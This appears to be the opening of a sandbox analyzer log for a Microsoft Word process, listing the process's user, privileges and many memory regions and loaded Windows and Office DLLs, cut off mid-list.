# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Nov 29 2018 14:58:43 # Log Creation Date: 06.12.2018 22:25:56.152 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x4635c000" os_pid = "0x8bc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 133 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 134 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 135 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 136 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 137 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 138 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 139 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 140 start_va = 0x80000 end_va = 0x86fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 141 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 142 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 143 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 144 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 145 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 146 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 147 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 148 start_va = 0x250000 end_va = 0x252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 149 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 150 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 151 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 152 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 153 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 154 start_va = 0x3a0000 end_va = 0x3a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 155 start_va = 0x3b0000 end_va = 0x3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 156 start_va = 0x3c0000 end_va = 0x3c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 157 start_va = 0x3d0000 end_va = 0x3d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 158 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 159 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 160 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 161 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 162 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 163 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 164 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 165 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 166 start_va = 0x1c70000 end_va = 0x1f3efff entry_point = 0x1c70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 167 start_va = 0x1f40000 end_va = 0x2332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 168 start_va = 0x2340000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 169 start_va = 0x2440000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 170 start_va = 0x2640000 end_va = 0x271efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002640000" filename = "" Region: id = 171 start_va = 0x2720000 end_va = 0x2720fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 172 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 173 start_va = 0x2740000 end_va = 0x2740fff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 174 start_va = 0x2750000 end_va = 0x2750fff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 175 start_va = 0x2760000 end_va = 0x2760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 176 start_va = 0x2770000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 177 start_va = 0x27f0000 end_va = 0x27f4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 178 start_va = 0x2800000 end_va = 0x2800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 179 start_va = 0x2810000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 180 start_va = 0x2910000 end_va = 0x2937fff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 181 start_va = 0x2940000 end_va = 0x29aafff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 182 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 183 start_va = 0x2ab0000 end_va = 0x2b6ffff entry_point = 0x2ab0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 184 start_va = 0x2b70000 end_va = 0x2b71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 185 start_va = 0x2b80000 end_va = 0x2b8bfff entry_point = 0x2b80000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 186 start_va = 0x2b90000 end_va = 0x2b97fff entry_point = 0x2b90000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 187 start_va = 0x2ba0000 end_va = 0x2baffff entry_point = 0x2ba0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 188 start_va = 0x2bb0000 end_va = 0x2bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bb0000" filename = "" Region: id = 189 start_va = 0x2bc0000 end_va = 0x2bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 190 start_va = 0x2bd0000 end_va = 0x2bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 191 start_va = 0x2be0000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 192 start_va = 0x2c60000 end_va = 0x2c60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 193 start_va = 0x2c70000 end_va = 0x2c70fff entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 194 start_va = 0x2c80000 end_va = 0x2c81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 195 start_va = 0x2c90000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 196 start_va = 0x2d90000 end_va = 0x2d90fff entry_point = 0x2d90000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 197 start_va = 0x2da0000 end_va = 0x2dbffff entry_point = 0x2da0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 198 start_va = 0x2dc0000 end_va = 0x2dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dc0000" filename = "" Region: id = 199 start_va = 0x2e00000 end_va = 0x2e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 200 start_va = 0x2e20000 end_va = 0x2f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 201 start_va = 0x2fc0000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 202 start_va = 0x3100000 end_va = 0x31fffff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 203 start_va = 0x3200000 end_va = 0x35fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 204 start_va = 0x3600000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 205 start_va = 0x3700000 end_va = 0x37fffff entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 206 start_va = 0x3890000 end_va = 0x389ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 207 start_va = 0x38c0000 end_va = 0x39bffff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 208 start_va = 0x39c0000 end_va = 0x3abffff entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 209 start_va = 0x3b40000 end_va = 0x3bbffff entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 210 start_va = 0x3bc0000 end_va = 0x3fbffff entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 211 start_va = 0x4000000 end_va = 0x407ffff entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 212 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 213 start_va = 0x4180000 end_va = 0x427ffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 214 start_va = 0x4280000 end_va = 0x4a7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004280000" filename = "" Region: id = 215 start_va = 0x4a80000 end_va = 0x4dc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 216 start_va = 0x4dd0000 end_va = 0x4f01fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 217 start_va = 0x4fa0000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 218 start_va = 0x5020000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 219 start_va = 0x5070000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 220 start_va = 0x50f0000 end_va = 0x5a1ffff entry_point = 0x50f0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 221 start_va = 0x5a90000 end_va = 0x5b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 222 start_va = 0x5c00000 end_va = 0x5cfffff entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 223 start_va = 0x5d00000 end_va = 0x5d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 224 start_va = 0x5d50000 end_va = 0x5e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d50000" filename = "" Region: id = 225 start_va = 0x5ec0000 end_va = 0x5ecffff entry_point = 0x0 region_type = private name = "private_0x0000000005ec0000" filename = "" Region: id = 226 start_va = 0x5f20000 end_va = 0x601ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f20000" filename = "" Region: id = 227 start_va = 0x6020000 end_va = 0x611ffff entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 228 start_va = 0x6120000 end_va = 0x621ffff entry_point = 0x0 region_type = private name = "private_0x0000000006120000" filename = "" Region: id = 229 start_va = 0x62d0000 end_va = 0x63cffff entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 230 start_va = 0x6410000 end_va = 0x650ffff entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 231 start_va = 0x6550000 end_va = 0x664ffff entry_point = 0x0 region_type = private name = "private_0x0000000006550000" filename = "" Region: id = 232 start_va = 0x6650000 end_va = 0x6e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 233 start_va = 0x6e50000 end_va = 0x6f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e50000" filename = "" Region: id = 234 start_va = 0x6f50000 end_va = 0x7f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f50000" filename = "" Region: id = 235 start_va = 0x7ff0000 end_va = 0x806ffff entry_point = 0x0 region_type = private name = "private_0x0000000007ff0000" filename = "" Region: id = 236 start_va = 0x8100000 end_va = 0x817ffff entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 237 start_va = 0x8180000 end_va = 0x857ffff entry_point = 0x0 region_type = private name = "private_0x0000000008180000" filename = "" Region: id = 238 start_va = 0x37a30000 end_va = 0x37a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000037a30000" filename = "" Region: id = 239 start_va = 0x37c80000 end_va = 0x37c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000037c80000" filename = "" Region: id = 240 start_va = 0x751b0000 end_va = 0x751e2fff entry_point = 0x751b0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 241 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 242 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 243 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 244 start_va = 0x77e00000 end_va = 0x77e06fff entry_point = 0x77e00000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 245 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 246 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 247 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 248 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 249 start_va = 0x13f550000 end_va = 0x13f72bfff entry_point = 0x13f550000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe") Region: id = 250 start_va = 0x7febdd50000 end_va = 0x7febdd5ffff entry_point = 0x0 region_type = private name = "private_0x000007febdd50000" filename = "" Region: id = 251 start_va = 0x7febfb90000 end_va = 0x7febfb9ffff entry_point = 0x0 region_type = private name = "private_0x000007febfb90000" filename = "" Region: id = 252 start_va = 0x7fee5af0000 end_va = 0x7fee5c63fff entry_point = 0x7fee5af0000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll") Region: id = 253 start_va = 0x7fee5c70000 end_va = 0x7fee5d89fff entry_point = 0x7fee5c70000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ADAL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\adal.dll") Region: id = 254 start_va = 0x7fee5d90000 end_va = 0x7fee602afff entry_point = 0x7fee5d90000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 255 start_va = 0x7fee61d0000 end_va = 0x7fee6268fff entry_point = 0x7fee61d0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 256 start_va = 0x7fee6270000 end_va = 0x7fee63edfff entry_point = 0x7fee6270000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 257 start_va = 0x7fee63f0000 end_va = 0x7fee65bffff entry_point = 0x7fee63f0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 258 start_va = 0x7fee65c0000 end_va = 0x7feea9a6fff entry_point = 0x7fee65c0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 259 start_va = 0x7feea9b0000 end_va = 0x7feeb6a4fff entry_point = 0x7feea9b0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 260 start_va = 0x7feeb6b0000 end_va = 0x7feebaecfff entry_point = 0x7feeb6b0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 261 start_va = 0x7feebaf0000 end_va = 0x7feed51bfff entry_point = 0x7feebaf0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 262 start_va = 0x7feed520000 end_va = 0x7feee1c6fff entry_point = 0x7feed520000 region_type = mapped_file name = "mso98win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll") Region: id = 263 start_va = 0x7feee1d0000 end_va = 0x7feeec9efff entry_point = 0x7feee1d0000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 264 start_va = 0x7feeeca0000 end_va = 0x7feef383fff entry_point = 0x7feeeca0000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 265 start_va = 0x7feef390000 end_va = 0x7feef832fff entry_point = 0x7feef390000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 266 start_va = 0x7feef840000 end_va = 0x7fef07c4fff entry_point = 0x7feef840000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 267 start_va = 0x7fef07d0000 end_va = 0x7fef2fa8fff entry_point = 0x7fef07d0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 268 start_va = 0x7fef3020000 end_va = 0x7fef308efff entry_point = 0x7fef3020000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 269 start_va = 0x7fef3170000 end_va = 0x7fef31aafff entry_point = 0x7fef3170000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 270 start_va = 0x7fef31e0000 end_va = 0x7fef337cfff entry_point = 0x7fef31e0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 271 start_va = 0x7fef3380000 end_va = 0x7fef343ffff entry_point = 0x7fef3380000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 272 start_va = 0x7fef3440000 end_va = 0x7fef3521fff entry_point = 0x7fef3440000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 273 start_va = 0x7fef3530000 end_va = 0x7fef35bafff entry_point = 0x7fef3530000 region_type = mapped_file name = "mso50win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll") Region: id = 274 start_va = 0x7fef35c0000 end_va = 0x7fef365bfff entry_point = 0x7fef35c0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcp140.dll") Region: id = 275 start_va = 0x7fef3660000 end_va = 0x7fef3725fff entry_point = 0x7fef3660000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 276 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 277 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 278 start_va = 0x7fef54d0000 end_va = 0x7fef5540fff entry_point = 0x7fef54d0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 279 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 280 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 281 start_va = 0x7fef6100000 end_va = 0x7fef62f1fff entry_point = 0x7fef6100000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 282 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 283 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" 